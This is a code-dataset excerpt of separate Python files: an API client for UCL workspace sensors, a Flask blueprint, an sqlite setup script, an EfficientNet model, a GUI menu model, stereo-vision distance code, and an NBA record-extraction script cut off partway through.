\r\n return [self.point.xData[0],self.point.yData[0]]\r\n\r\n\r\n def trafficLight(self,xLight,yLight):\r\n\r\n if self.xRef is not None:\r\n self.xRef.setMovable(xLight)\r\n if self.yRef is not None:\r\n self.yRef.setMovable(yLight)\r\n\r\n \r\n def suicide(self):\r\n \r\n if self.xRef is not None:\r\n self.parent.removeItem(self.xRef)\r\n if self.yRef is not None:\r\n self.parent.removeItem(self.yRef)\r\n \r\n self.parent.removeItem(self.point)","sub_path":"upfiles/EPiQ_2f_3.0.0/libs/cursor.py","file_name":"cursor.py","file_ext":"py","file_size_in_byte":4115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"624940406","text":"import requests\nfrom urllib.parse import urljoin\n\nfrom .settings import supported_api_versions\nfrom .exception import InvalidAPIVersion\n\n\nclass Workspaces():\n def __init__(self, token, version='v0'):\n \"\"\"\n Args:\n version (string): specifies UCL API version.\n Default is 'v0'.\n Raises:\n InvalidAPIVersion: If UCL API version is not supported.\n \"\"\"\n try:\n self.base_url = supported_api_versions[version]\n except:\n raise InvalidAPIVersion\n\n self.token = token\n self.survey_url = urljoin(self.base_url, 'workspaces/surveys')\n self.sensors_url = urljoin(self.base_url, 'workspaces/sensors')\n self.averages_url = urljoin(self.base_url,\n 'workspaces/sensors/averages/time')\n self.updated_url = urljoin(self.base_url,\n 'workspaces/sensors/lastupdated')\n self.sensor_summary_url = urljoin(self.base_url,\n 'workspaces/sensors/summary')\n self.map_images_url = urljoin(self.base_url, 'workspaces/images/map')\n self.live_map_images_url = urljoin(self.map_images_url, '/live')\n\n def get_surveys(self):\n params = {\n \"token\": self.token,\n }\n survey = requests.get(self.survey_url, params=params)\n return survey.json()\n\n def get_sensor_by_survey(self, survey_id=\"46\",\n return_states=\"true\"):\n params = {\n \"token\": self.token,\n \"survey_id\": survey_id,\n \"return_states\": return_states,\n }\n\n sensor_survey = requests.get(self.sensors_url, params=params)\n return sensor_survey.json()\n\n def get_sensor_averages(self, days=\"30\", survey_ids=\"46,45\"):\n params = {\n \"token\": self.token,\n \"days\": days,\n \"survey_ids\": survey_ids,\n }\n sensor_averages = requests.get(self.averages_url, params=params)\n return sensor_averages.json()\n\n def get_sensor_last_update(self, survey_id=\"46\"):\n params = 
{\n \"token\": self.token,\n \"survey_id\": survey_id,\n }\n sensor_last_update = requests.get(self.updated_url,\n params=params)\n return sensor_last_update.json()\n\n def get_sensor_summary(self, survey_ids=\"46,45\"):\n params = {\n \"token\": self.token,\n \"survey_ids\": survey_ids,\n }\n sensor_summary = requests.get(self.sensor_summary_url,\n params=params)\n return sensor_summary.json()\n\n def get_map_images(self, image_id=\"79\", image_format=\"base64\"):\n params = {\n \"token\": self.token,\n \"image_id\": image_id,\n \"image_format\": image_format,\n }\n map_image = requests.get(self.map_images_url, params=params)\n return map_image.json()\n\n def get_map_images_with_seat_states(self, survey_id=\"22\",\n map_id=\"3\", image_scale=None,\n circle_radius=None,\n absent_colour=None,\n occupied_colour=None):\n params = {\n \"token\": self.token,\n \"survey_id\": survey_id,\n \"map_id\": map_id,\n \"image_scale\": image_scale,\n \"circle_radius\": circle_radius,\n \"absent_colour\": absent_colour,\n \"occupied_colour\": occupied_colour,\n }\n map_images_seat_states = requests.get(self.live_map_images_url,\n params=params)\n return map_images_seat_states.json()\n","sub_path":"uclapi/workspaces.py","file_name":"workspaces.py","file_ext":"py","file_size_in_byte":3790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"114800257","text":"from views import homepage\n\nfrom flask import Blueprint, url_for\n\nblog_bp = Blueprint('blog', __name__,\n url_prefix='',\n subdomain='blog')\n\n\nblog_bp.add_url_rule('/', view_func=homepage, methods=['GET'])\nblog_bp.add_url_rule('/index', view_func=homepage, methods=['GET'])\n","sub_path":"resources/blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"506329896","text":"import sqlite3\n\nconn = sqlite3.connect('zadanie09_baza.db')\n\nc = conn.cursor()\n\nzapytanie = \"\"\"\nCREATE TABLE \"zwierzaki\" (\n \"id\"\tINTEGER NOT NULL PRIMARY KEY AUTOINCREMENT UNIQUE,\n \"imie\"\tTEXT NOT NULL,\n \"gatunek\"\tTEXT,\n \"wiek\"\tREAL\n);\n\"\"\"\n\nc.execute(zapytanie)\n\nconn.commit()\nconn.close()\n","sub_path":"Python - advanced/zajecia09/0901_create_rozwiązanie.py","file_name":"0901_create_rozwiązanie.py","file_ext":"py","file_size_in_byte":302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"465947203","text":"import timm\nimport torch\nimport torch.nn as nn\nimport torchvision\nimport torch.nn.functional as F\nfrom timm.models.efficientnet import *\n\nclass Net(nn.Module):\n def __init__(self):\n super(Net, self).__init__()\n\n e = tf_efficientnetv2_l(pretrained=True, drop_rate=0.55, drop_path_rate=0.5)\n self.b0 = nn.Sequential(\n e.conv_stem,\n e.bn1,\n e.act1,\n )\n self.b1 = e.blocks[0]\n self.b2 = e.blocks[1]\n self.b3 = e.blocks[2]\n self.b4 = e.blocks[3]\n self.b5 = e.blocks[4]\n self.b6 = e.blocks[5]\n self.b7 = e.blocks[6]\n self.b8 = nn.Sequential(\n e.conv_head, #384, 1536\n e.bn2,\n e.act2\n )\n# self.act2 = F.sigmoid()\n \n self.logit = nn.Sequential(\n nn.Linear(1280, 512),\n nn.SiLU(inplace=True),\n nn.BatchNorm1d(512),\n nn.Linear(512, num_study_label)\n )\n self.mask = nn.Sequential(\n nn.Conv2d(384, 128, kernel_size=3, padding=1),\n nn.BatchNorm2d(128),\n nn.ReLU(inplace=True),\n nn.Conv2d(128, 128, kernel_size=3, padding=1),\n nn.BatchNorm2d(128),\n nn.ReLU(inplace=True),\n nn.Conv2d(128, 1, 
kernel_size=1, padding=0),\n )\n\n\n # @torch.cuda.amp.autocast()\n def forward(self, image):\n batch_size = len(image)\n x = 2*image-1 # ; print('input ', x.shape)\n\n x = self.b0(x) #; print (x.shape) # torch.Size([2, 40, 256, 256])\n x = self.b1(x) #; print (x.shape) # torch.Size([2, 24, 256, 256])\n x = self.b2(x) #; print (x.shape) # torch.Size([2, 32, 128, 128])\n x = self.b3(x) #; print (x.shape) # torch.Size([2, 48, 64, 64])\n x = self.b4(x) #; print (x.shape) # torch.Size([2, 96, 32, 32])\n x = self.b5(x) #; print (x.shape) # torch.Size([2, 136, 32, 32])\n #------------\n \n #-------------\n x = self.b6(x) #; print (x.shape) # torch.Size([2, 232, 16, 16])\n mask = self.mask(x)\n x = self.b7(x) #; print (x.shape) # torch.Size([2, 384, 16, 16])\n x = self.b8(x) #; print (x.shape) # torch.Size([2, 1536, 16, 16])\n# x = self.act2(x)\n x = F.adaptive_avg_pool2d(x,1).reshape(batch_size,-1)\n #x = F.dropout(x, 0.5, training=self.training)\n# x = self.lin(x)\n logit = self.logit(x)\n return logit, mask\n\n\n\n\n# check #################################################################\n\ndef run_check_net():\n batch_size = 2\n C, H, W = 3, 512, 512\n #C, H, W = 3, 640, 640\n image = torch.randn(batch_size, C, H, W).cuda()\n mask = torch.randn(batch_size, num_study_label, H, W).cuda()\n\n net = Net().cuda()\n logit, mask = net(image)\n\n print(image.shape)\n print(logit.shape)\n print(mask.shape)\n\n\n# main #################################################################\nif __name__ == '__main__':\n run_check_net()\n\n\n","sub_path":"model/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":2998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"73209266","text":"from zoundry.appframework.global_services import getResourceRegistry\r\nfrom zoundry.appframework.ui.widgets.controls.common.menu.menumodel import ZPluginMenuModel\r\nfrom zoundry.blogapp.constants import IZBlogAppActionIDs\r\nfrom zoundry.blogapp.constants import IZBlogAppMenuIds\r\n\r\n\r\nMENU_ITEMS = [\r\n # gravity, actionId, boldFlag, iconPath\r\n (5, IZBlogAppActionIDs.BLOG_NEW_BLOG_POST_ACTION, False, u\"images/common/menu/blog/newpost.png\"), #$NON-NLS-1$\r\n (20, IZBlogAppActionIDs.DOWNLOAD_BLOG_TEMPLATE_ACTION, False, u\"images/common/menu/blog/download_template.png\"), #$NON-NLS-1$\r\n (55, IZBlogAppActionIDs.VIEW_BLOG_ACTION, False, u\"images/common/menu/view_online.png\"), #$NON-NLS-1$\r\n (65, IZBlogAppActionIDs.CONFIGURE_BLOG_ACTION, False, u\"images/common/menu/blog/configure.png\"), #$NON-NLS-1$\r\n]\r\n\r\n\r\n# ------------------------------------------------------------------------------\r\n# Menu model used for the Blog context menu.\r\n# ------------------------------------------------------------------------------\r\nclass ZBlogMenuModel(ZPluginMenuModel):\r\n\r\n def __init__(self):\r\n ZPluginMenuModel.__init__(self, IZBlogAppMenuIds.ZID_BLOG_MENU)\r\n\r\n self._buildModel()\r\n # end __init__()\r\n\r\n def _buildModel(self):\r\n registry = getResourceRegistry()\r\n\r\n for (gravity, actionId, boldFlag, iconPath) in MENU_ITEMS:\r\n menuId = self.addMenuItemWithActionId(gravity, actionId, None)\r\n self.setMenuItemBold(menuId, boldFlag)\r\n if iconPath is not None:\r\n bitmap = registry.getBitmap(iconPath)\r\n self.setMenuItemBitmap(menuId, bitmap)\r\n\r\n self.addSeparator(50)\r\n # end _buildModel()\r\n\r\n# end 
ZBlogMenuModel\r\n\r\n","sub_path":"src/python/zoundry/blogapp/ui/menus/blog/blogmenu.py","file_name":"blogmenu.py","file_ext":"py","file_size_in_byte":1743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"477904373","text":"import cv2\nimport numpy as np\nimport math\n\n#Takes an image and returns an inverted blured (noise removed) binary image in its place\ndef biModalInvBlur(image):\n\n\t#turns all pixels that are darker than 60 -> 255, all others 0\n\timage1 = cv2.threshold(image, 60, 255, cv2.THRESH_BINARY_INV)\n\t\n\theight, width = image.shape\n\t\n\t#add border and blur to remove noise from image\n\ttempImg = cv2.copyMakeBorder(image1[1],5,5,5,5,cv2.BORDER_CONSTANT,value=(0,0,0,0))\t\n\ttempImg = cv2.medianBlur(tempImg,7)\n\t\n\t#return bimodal image\n\timage = tempImg[5:5+height,5:width+5]\n\treturn image\n\t\n\n#Takes an image and returns the center of mass of the white central contour\n#for this function to work the image must be binary, and the noise must be removed\n#such that there is only one contour in the image\n#centroid[0] is the x cooridnate\n#centroid[1] is the y cooridnate\ndef centerMass(image):\n\n\t#find the moments of the image\n\tmoments = cv2.moments(image,True)\n\t\n\tcentroid = ( moments['m10']/moments['m00'],moments['m01']/moments['m00'] )\n\t\n\n\treturn centroid\n\t\n\t\ndef undistortImg(image, intrinsicMatrix, distortionCoeffs, refinedCameraMatrix, ROI):\n\t\n\t# undistort\n\tundistortedImage = cv2.undistort(image, intrinsicMatrix, distortionCoeffs, None, refinedCameraMatrix)\n\n\t# crop the image\n\tx,y,w,h = ROI\n\tundistortedImage = undistortedImage[y:y+h, x:x+w]\n\t\t\n\treturn undistortedImage\n\t\n\t\n#alpha2angle takes in the number of pixels from the left edge of an undistorted image and returns how many radians that is from camA\n#this works for LeftCam\ndef convert2Alpha(pixels):\n \n #each pixel is N deg in FOV\n #multiply the number of pixels by that conversion factor to get degress from the left\n #convert to radians\n\n\tdegPerPixel = 0.574712\n\t#X is the angle of the left edge of the picture\n\t#X = 59.65\n\tX = 120.34\n\t#alpha = 20 / 33.9333333*pixels*-1\n\talpha = degPerPixel*pixels\n\t#the left camera is mounted pivioted in X deg\n\talpha = X - alpha\n\treturn math.radians(alpha)\n\n#this works for RightCam\ndef convert2Beta(pixels):\n\n\tdegPerPixel = 0.515464\n\t#X is the angle of the left edge of the picture\n\tX = 25\n\tbeta = degPerPixel*pixels\n\t#the right camera is mounted pivioted in X deg\n\tbeta = X + beta\n\treturn math.radians(beta)\n\t\ndef calculateAngleAndDistance(leftImage, rightImage, leftCamera, rightCamera):\n\t#returned values are: \n\t#\tthe distance for the center point of the robot to the object\n\t#\tthe angle for that same center point (negative is left)\n\n\t#Outline of steps\n\t#Load Intrisic Matricies\n\t#Load Distortion Coeficcients\n\n\t#Load Left Image\n\t##Make Image Bimodal\n\t##Undistort Image\n\t##Find center of mass\n \n\t#Load Right Image\n\t##Make Image Bimodal\n\t##Undistort Image\n\t##Find center of mass \n\n\t#Use law of cosines to calculate distance\n\n\tbwImageLeft = biModalInvBlur(leftImage)\n\tuImageLeft = undistortImg(bwImageLeft, leftCamera['intrinsicMatrix'], leftCamera['distortionCoeffs'], leftCamera['refinedCameraMatrix'], leftCamera['roi'])\n\tcenterLeft = centerMass(uImageLeft)\n\t\n\tbwImageRight = biModalInvBlur(rightImage)\n\tuImageRight = undistortImg(bwImageRight, rightCamera['intrinsicMatrix'], 
rightCamera['distortionCoeffs'], rightCamera['refinedCameraMatrix'], rightCamera['roi'])\n\tcenterRight = centerMass(uImageRight)\n\t\n\t#these are radians from left and right\n\talpha = convert2Alpha(centerLeft[0])\n\n\tbeta = convert2Beta(centerRight[0])\n\t\n\treturnObj = privateDistanceFcnLeft(alpha, beta)\n\t\n\t\n\treturn returnObj\n\t\ndef privateDistanceFcnLeft(alpha, beta):\n\tS = (177.8 * math.sin(beta)) / (math.sin(math.pi - beta - alpha))\n\tobjDistance = math.sqrt(7903.21 + (S*S) - (177.8 * S * math.cos(alpha)))\n\ttmpVar = S*math.sin(alpha)/objDistance\n\n\tangle1 = math.asin(88.9*math.sin(alpha)/objDistance)\n\tomega = math.pi - angle1 - alpha\n\t\n\ttheta = (math.pi/2) - omega\n\ttheta = math.degrees(theta)\n\t\n\treturn (objDistance, theta)\n\t\ndef privateDistanceFcnRight(alpha, beta):\n\tS = (177.8 * math.sin(beta)) / (math.sin(math.pi - beta-alpha))\n\tobjDistance = math.sqrt(7903.21 + (S*S) - (177.8 * S * math.cos(beta)))\n\tangle1 = math.asin(88.9*math.sin(beta)/objDistance)\n\tomega = math.pi - angle1 - beta\n\ttheta = (math.pi/2) - omega\n\ttheta = math.degrees(theta)\n\t\n\treturn [objDistance, theta]\n\n","sub_path":"python/FinalDemo/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":4176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"275118210","text":"n1=int(input())\nn2=int(input())\nnum1=abs(n1)\nnum2=abs(n2)\nsum=0\nwhile(num1>=num2):\n sum=sum+1\n num1=num1-num2\n\nnum=n1*n2\nif(num<0): sum=0-sum\nprint(sum)","sub_path":"Code/CodeRecords/2068/60773/244186.py","file_name":"244186.py","file_ext":"py","file_size_in_byte":158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"267958255","text":"import re, io, copy, os, sys, argparse, json, pdb, jsonlines\nfrom tqdm import tqdm\nfrom collections import Counter, OrderedDict\nfrom domain_knowledge import Domain_Knowledge\nknowledge_container = Domain_Knowledge()\n\nDELIM = \"│\"\nUNK = 0\nNA = 'N/A'\nPAD_WORD = ''\nUNK_WORD = ''\nBOS_WORD = ''\nEOS_WORD = ''\n\n# ------------------------------- #\n# --- very important patterns --- #\n# ------------------------------- #\n\n# a long pattern with 2-6 numbers\npattern1 = re.compile(\"\\( (?:\\d+ - \\d+ FG)?(?: (?:,|\\.) \\d+ - \\d+ 3PT)?(?: (?:,|\\.) \\d+ - \\d+ FT)? \\)\")\n\n# patterns with 1 number\npattern2 = re.compile(\"assist(?:ed)? 
on \\d+\")\n# the + field, three_point, free, charity, floor; behind/beyond the arc/three; deep/distance/long range;\npattern3 = re.compile(\"\\d+ percent from the \\S+\")\n\n# patterns with 2 numbers\npattern4 = re.compile(\"\\d+ (?:- )?(?:of|for|-) (?:- )?(?:\\S+ )?\\d+ (?:shooting )?from (?:the )?\\S+\")\npattern5 = re.compile(\"\\d+ (?:- )?(?:of|for) (?:- )?(?:\\S+ )?\\d+ \\S+\")\npattern6 = re.compile(\"\\( \\d+ - \\d+ \\)\")\npattern7 = re.compile(\"\\d+ - \\d+\")\n\ncount_missing = dict.fromkeys(list(range(1, 43)), 0)\n\nword2record = {\n 8: ('board', 'REB'),\n 9: ('assist', 'AST'),\n 10: ('dime', 'AST'),\n 11: ('minute', 'MIN'),\n 12: ('percent', 'PCT'),\n 13: ('steal', 'STL'),\n 14: ('block', 'BLK'),\n 15: ('turnover', 'TOV'),\n 16: ('three_pointer', 'FG3'),\n 17: ('three_point', 'FG3'),\n 18: ('three', 'FG3'),\n 19: ('3PT', 'FG3'),\n 20: ('attempt', 'ATMP'),\n 21: ('free_throw', 'FT'),\n 22: ('shot', 'FG'),\n 23: ('offensive', 'OREB'),\n 24: ('offensively', 'OREB'),\n 25: ('made', 'FG'),\n 26: ('point', 'PTS'),\n 27: ('rebound', 'REB'),\n}\nword2record = OrderedDict(word2record)\n\npost_donts = {\n 28: ('quarter', None),\n 29: ('straight', None),\n 30: ('starter', None),\n 31: ('lead', None),\n 32: ('team', None),\n 33: ('content', None),\n 34: ('run', None),\n 35: ('tie', None),\n 36: ('game', None),\n 37: ('player', None),\n}\npost_donts = OrderedDict(post_donts)\n\npre_donts = {\n 38: ('combined? for(?: \\S+)? \\d+', None),\n 39: ('averag\\S+(?: \\S+)? \\d+', None),\n 40: ('\\d{4} - \\d{2,4}', None),\n 41: ('(?:first|last) \\d+ minutes?', None),\n 42: ('\\d+ minutes? (?:left|remaining)', None),\n}\n\npre_donts = OrderedDict(pre_donts)\n\nsuffix2field = dict.fromkeys(['field', 'floor'])\nsuffix2three = dict.fromkeys(['three_point', 'beyond', 'behind', 'long', 'deep', 'downtown', '3', 'distance'])\nsuffix2foul = dict.fromkeys(['free_throw', 'charity', 'line', 'foul', 'stripe'])\n\n# ----------------------------------------- #\n# --- identify patterns to be processed --- #\n# ----------------------------------------- #\n\ndef mark_records(sent):\n x = copy.deepcopy(sent)\n i = 1\n\n for idx, (k, v) in pre_donts.items():\n p = re.compile(k)\n delim = \"#DELIM{}#\".format(idx)\n for f in re.findall(p, x):\n rep = \"{}{}{}\".format(delim, delim.join(f.split()), delim)\n x = x.replace(f, rep)\n\n for p in [pattern1, pattern2, pattern3, pattern4, pattern5, pattern6, pattern7]:\n delim = \"#DELIM{}#\".format(i)\n i += 1\n for f in re.findall(p, x):\n rep = \"{}{}{}\".format(delim, delim.join(f.split()), delim)\n x = x.replace(f, rep)\n\n for idx, (k, v) in (list(word2record.items()) + list(post_donts.items())):\n p = re.compile(\"\\d+ (?:- )*{}(?:s|ed)*\".format(k))\n delim = \"#DELIM{}#\".format(idx)\n for f in re.findall(p, x):\n rep = \"{}{}{}\".format(delim, delim.join(f.split()), delim)\n x = x.replace(f, rep)\n\n return x\n\n\n# ------------------------------- #\n# --- very important patterns --- #\n# ------------------------------- #\n\ndef _get_record(value, num2rcds, priority):\n candidates = num2rcds.get(value, None)\n if candidates is None:\n if len(priority) > 1:\n return [], False\n else:\n return None, False\n\n candidates = sorted(candidates, key=lambda x: len(x.split(DELIM)[2]))\n assert len(priority) > 0\n if len(candidates) == 1:\n check = False\n for p in priority:\n if p in candidates[0].split(DELIM)[-2]:\n check = True\n break\n\n if len(priority) > 1:\n return candidates, check\n else:\n return candidates[0], check\n else:\n results = []\n check = False\n for p in 
priority:\n for c in candidates:\n if p in c.split(DELIM)[2]:\n results.append(c)\n check = True\n if check:\n if len(priority) > 1:\n return results, True\n else:\n return results[0], True\n else:\n if len(priority) > 1:\n return [], False\n else:\n return None, False\n\n\ndef retrieve_record(value, num2rcds, priority):\n candidate, check = _get_record(value, num2rcds, priority)\n\n # discard found candidates if it's not the desired rcd_type when priority list contains only 1 unambiguous rcd_type\n # NOTE: many numbers, like percentage are rounded, so the correct number may be +-1\n # others are mistakes incidentally captured and corrected\n if len(priority) == 1 and not check:\n for v in [value - 1, value + 1]:\n candidate, check = _get_record(v, num2rcds, priority)\n if candidate is not None and check:\n value = v\n break\n return candidate, value\n\n\n# ------------------------------- #\n# --- very important patterns --- #\n# ------------------------------- #\n\ndef get_records(phrase, num2rcds, the_other_team_records):\n # print(phrase)\n p = re.compile(\"#DELIM(\\d+)#\")\n temp = re.findall(p, phrase)\n pattern_num = int(temp[0])\n try:\n assert all([int(x) == pattern_num for x in temp])\n except:\n print(\"{} is misformatted\".format(phrase))\n sys.exit(0)\n delim = \"#DELIM{}#\".format(pattern_num)\n tokens = [x for x in phrase.split(delim) if len(x) > 0]\n numbers_are_at = [i for x, i in zip(tokens, range(len(tokens))) if x.isdigit()]\n numbers = [int(x) for x in tokens if x.isdigit()]\n\n result = []\n if pattern_num == 1:\n true_numbers_are_at = []\n tmp = re.compile(\"\\( (?:\\d+ - \\d+ (FG))?(?: (?:,|\\.) \\d+ - \\d+ (3PT))?(?: (?:,|\\.) \\d+ - \\d+ (FT))? \\)\")\n suffix = [x for x in re.findall(tmp, ' '.join(phrase.split(delim)).strip())[0] if len(x) > 0]\n\n # fix typos\n if len(suffix) == 3:\n words_are_at = [i for x, i in zip(tokens, range(len(tokens))) if not x.isdigit()]\n suffix_temp = copy.deepcopy(suffix)\n if not suffix_temp[0] == 'FG':\n suffix[0] = 'FG'\n tokens[words_are_at[0]] = 'FG'\n if not suffix_temp[1] == '3PT':\n suffix[1] = '3PT'\n tokens[words_are_at[1]] = '3PT'\n if not suffix_temp[2] == 'FT':\n suffix[2] = 'FT'\n tokens[words_are_at[2]] = 'FT'\n\n i = 0\n for s in suffix:\n if s == 'FG':\n fgm, fga = numbers[i], numbers[i + 1]\n cp1, num1 = retrieve_record(fgm, num2rcds, priority=['FGM'])\n cp2, num2 = retrieve_record(fga, num2rcds, priority=['FGA'])\n elif s == '3PT':\n fg3m, fg3a = numbers[i], numbers[i + 1]\n cp1, num1 = retrieve_record(fg3m, num2rcds, priority=['FG3M'])\n cp2, num2 = retrieve_record(fg3a, num2rcds, priority=['FG3A'])\n elif s == 'FT':\n ftm, fta = numbers[i], numbers[i + 1]\n cp1, num1 = retrieve_record(ftm, num2rcds, priority=['FTM'])\n cp2, num2 = retrieve_record(fta, num2rcds, priority=['FTA'])\n else:\n print(\"*** WARNING *** other pattern found {}\".format(phrase))\n print(\"phrase = {}\".format(phrase))\n print(\"s = {}\".format(s))\n print(\"suffix = {}\".format(suffix))\n sys.exit(0)\n if cp1 is None or cp2 is None:\n pass\n else:\n if cp1.split(DELIM)[-2][:2] == cp2.split(DELIM)[-2][:2]:\n true_numbers_are_at.extend(numbers_are_at[i:i + 1 + 1])\n tokens[numbers_are_at[i]] = str(num1)\n tokens[numbers_are_at[i + 1]] = str(num2)\n result.extend([cp1, cp2])\n else:\n pass\n i += 2\n numbers_are_at = true_numbers_are_at\n\n elif pattern_num == 2:\n cp, num = retrieve_record(numbers[0], num2rcds, priority=['AST'])\n if cp is not None:\n tokens[-1] = str(num)\n result.append(cp)\n\n elif pattern_num == 3:\n # the + field, 
three_point, free, charity, floor; behind/beyond the arc/three; deep/distance/long range;\n tmp = re.compile('\\d+ percent from (\\S+) (\\S+)')\n suf_1, suf_2 = re.findall(tmp, ' '.join(phrase.split(delim)).strip())[0]\n\n if suf_2 == '3':\n suf_2 = 'three_point'\n numbers_are_at.pop(-1)\n\n if suf_1 == 'the':\n if suf_2 in ['field', 'floor']:\n priority = ['FG_PCT']\n elif suf_2 == 'three_point':\n priority = ['FG3_PCT']\n elif suf_2 in ['free', 'charity']:\n priority = ['FT_PCT']\n else:\n priority = ['PCT']\n else:\n if suf_1 in ['behind', 'beyond', 'deep', 'distance', 'long']:\n priority = ['FG3_PCT']\n else:\n priority = ['PCT']\n cp, num = retrieve_record(numbers[0], num2rcds, priority=priority)\n if cp is not None:\n tokens[0] = str(num)\n result.append(cp)\n\n elif 4 <= pattern_num <= 7:\n if len(numbers) == 2:\n num1, num2 = numbers\n else:\n if numbers[-1] == 3:\n num1, num2, _ = numbers\n numbers_are_at.pop(-1)\n else:\n raise ValueError(\"*** WARNING *** phrase misformatted {}\".format(phrase))\n\n if pattern_num == 4:\n tmp = re.compile(\"\\d+ (?:- )?(?:of|for|-) (?:- )?(?:\\S+ )?\\d+ (?:shooting )?from (?:the )?(\\S+)\")\n suffix = re.findall(tmp, ' '.join(phrase.split(delim)).strip())[0]\n if suffix in suffix2field or suffix in suffix2three or suffix in suffix2foul:\n if suffix in suffix2field:\n p1 = ['FGM']\n p2 = ['FGA']\n elif suffix in suffix2three:\n p1 = ['FG3M']\n p2 = ['FG3A']\n elif suffix in suffix2foul:\n p1 = ['FTM']\n p2 = ['FTA']\n cp1, num1 = retrieve_record(num1, num2rcds, priority=p1)\n cp2, num2 = retrieve_record(num2, num2rcds, priority=p2)\n else:\n p1 = ['FG3M', 'FGM', 'FTM']\n p2 = ['FG3A', 'FGA', 'FTA']\n temp1, num1 = retrieve_record(num1, num2rcds, priority=p1)\n temp2, num2 = retrieve_record(num2, num2rcds, priority=p2)\n cp1, cp2 = None, None\n for x in temp1:\n for y in temp2:\n if x.split(DELIM)[2][:-1] == y.split(DELIM)[2][:-1]:\n cp1 = x\n cp2 = y\n break\n\n elif pattern_num == 5:\n tmp = re.compile(\"\\d+ (?:- )?(?:of|for) (?:- )?(?:\\S+ )?\\d+ (\\S+)\")\n suffix = re.findall(tmp, ' '.join(phrase.split(delim)).strip())[0]\n if suffix.startswith('sho'): # shot/shooting\n p1 = ['FGM']\n p2 = ['FGA']\n cp1, num1 = retrieve_record(num1, num2rcds, priority=p1)\n cp2, num2 = retrieve_record(num2, num2rcds, priority=p2)\n else:\n p1 = ['FG3M', 'FGM', 'FTM']\n p2 = ['FG3A', 'FGA', 'FTA']\n temp1, num1 = retrieve_record(num1, num2rcds, priority=p1)\n temp2, num2 = retrieve_record(num2, num2rcds, priority=p2)\n cp1, cp2 = None, None\n for x in temp1:\n for y in temp2:\n if x.split(DELIM)[2][:-1] == y.split(DELIM)[2][:-1]:\n cp1 = x\n cp2 = y\n break\n\n elif pattern_num == 6:\n cp1, num1 = retrieve_record(num1, num2rcds, priority=['TEAM-WINS'])\n cp2, num2 = retrieve_record(num2, num2rcds, priority=['TEAM-LOSSES'])\n if cp1 is None or cp2 is None:\n cp1, num1 = retrieve_record(num1, num2rcds, priority=['TEAM-LOSSES'])\n cp2, num2 = retrieve_record(num2, num2rcds, priority=['TEAM-WINS'])\n if cp1 is None or cp2 is None:\n # if len(priority) > 1, cp1 and cp2 are lists\n temp1, num1 = retrieve_record(num1, num2rcds, priority=['FG3M', 'FGM', 'FTM', 'REB'])\n temp2, num2 = retrieve_record(num2, num2rcds, priority=['FG3A', 'FGA', 'FTA', 'REB'])\n\n cp1, cp2 = None, None\n for x in temp1:\n for y in temp2:\n if x.split(DELIM)[2][:-1] == y.split(DELIM)[2][:-1]:\n cp1 = x\n cp2 = y\n break\n\n elif pattern_num == 7:\n if the_other_team_records is not None:\n cp1, num1 = retrieve_record(num1, num2rcds, priority=['TEAM-PTS'])\n cp2, num2 = retrieve_record(num2, 
the_other_team_records, priority=['TEAM-PTS'])\n if cp1 is None or cp2 is None:\n cp1, num1 = retrieve_record(num1, the_other_team_records, priority=['TEAM-PTS'])\n cp2, num2 = retrieve_record(num2, num2rcds, priority=['TEAM-PTS'])\n\n if cp1 is None or cp2 is None:\n # if not found separately, combine and continue searching\n for k, v in the_other_team_records.items():\n if not k in num2rcds:\n num2rcds[k] = v\n else:\n num2rcds[k].extend(v)\n temp1, num1 = retrieve_record(num1, num2rcds,\n priority=['TEAM-WINS', 'TEAM-PTS', 'REB', 'AST', 'FTM', 'FGM',\n 'FG3M'])\n temp2, num2 = retrieve_record(num2, num2rcds,\n priority=['TEAM-LOSSES', 'TEAM-PTS', 'REB', 'AST', 'FTA', 'FGA',\n 'FG3A'])\n cp1, cp2 = None, None\n\n for x in temp1:\n for y in temp2:\n if x.split(DELIM)[2][:-1] == y.split(DELIM)[2][:-1] or (\n x.split(DELIM)[2] == 'TEAM-WINS' and y.split(DELIM)[2] == 'TEAM-LOSSES'):\n cp1 = x\n cp2 = y\n break\n else:\n temp1, num1 = retrieve_record(num1, num2rcds,\n priority=['TEAM-WINS', 'TEAM-PTS', 'REB', 'AST', 'FTM', 'FGM', 'FG3M'])\n temp2, num2 = retrieve_record(num2, num2rcds,\n priority=['TEAM-LOSSES', 'TEAM-PTS', 'REB', 'AST', 'FTA', 'FGA', 'FG3A'])\n cp1, cp2 = None, None\n\n for x in temp1:\n for y in temp2:\n if x.split(DELIM)[2][:-1] == y.split(DELIM)[2][:-1] or (\n x.split(DELIM)[2] == 'TEAM-WINS' and y.split(DELIM)[2] == 'TEAM-LOSSES'):\n cp1 = x\n cp2 = y\n break\n\n if cp1 is None or cp2 is None:\n pass\n else:\n _, team_1, rcd_type_1, _ = cp1.split(DELIM)\n _, team_2, rcd_type_2, _ = cp2.split(DELIM)\n\n if rcd_type_1.startswith('TEAM'):\n if not rcd_type_2.startswith('TEAM'):\n pass\n else:\n if rcd_type_1 == 'TEAM-WINS':\n if not rcd_type_2 == 'TEAM-LOSSES':\n pass\n else:\n if team_1 == team_2:\n tokens[numbers_are_at[0]] = str(num1)\n tokens[numbers_are_at[1]] = str(num2)\n result = [cp1, cp2]\n else:\n pass\n\n elif rcd_type_1 == 'TEAM-PTS':\n if not rcd_type_2 == 'TEAM-PTS':\n pass\n else:\n if not (team_1 == team_2):\n tokens[numbers_are_at[0]] = str(num1)\n tokens[numbers_are_at[1]] = str(num2)\n result = [cp1, cp2]\n else:\n pass\n\n else:\n # enforcing a pair of digits having the same rcd_type\n if rcd_type_1 == rcd_type_2 and team_1 != team_2:\n tokens[numbers_are_at[0]] = 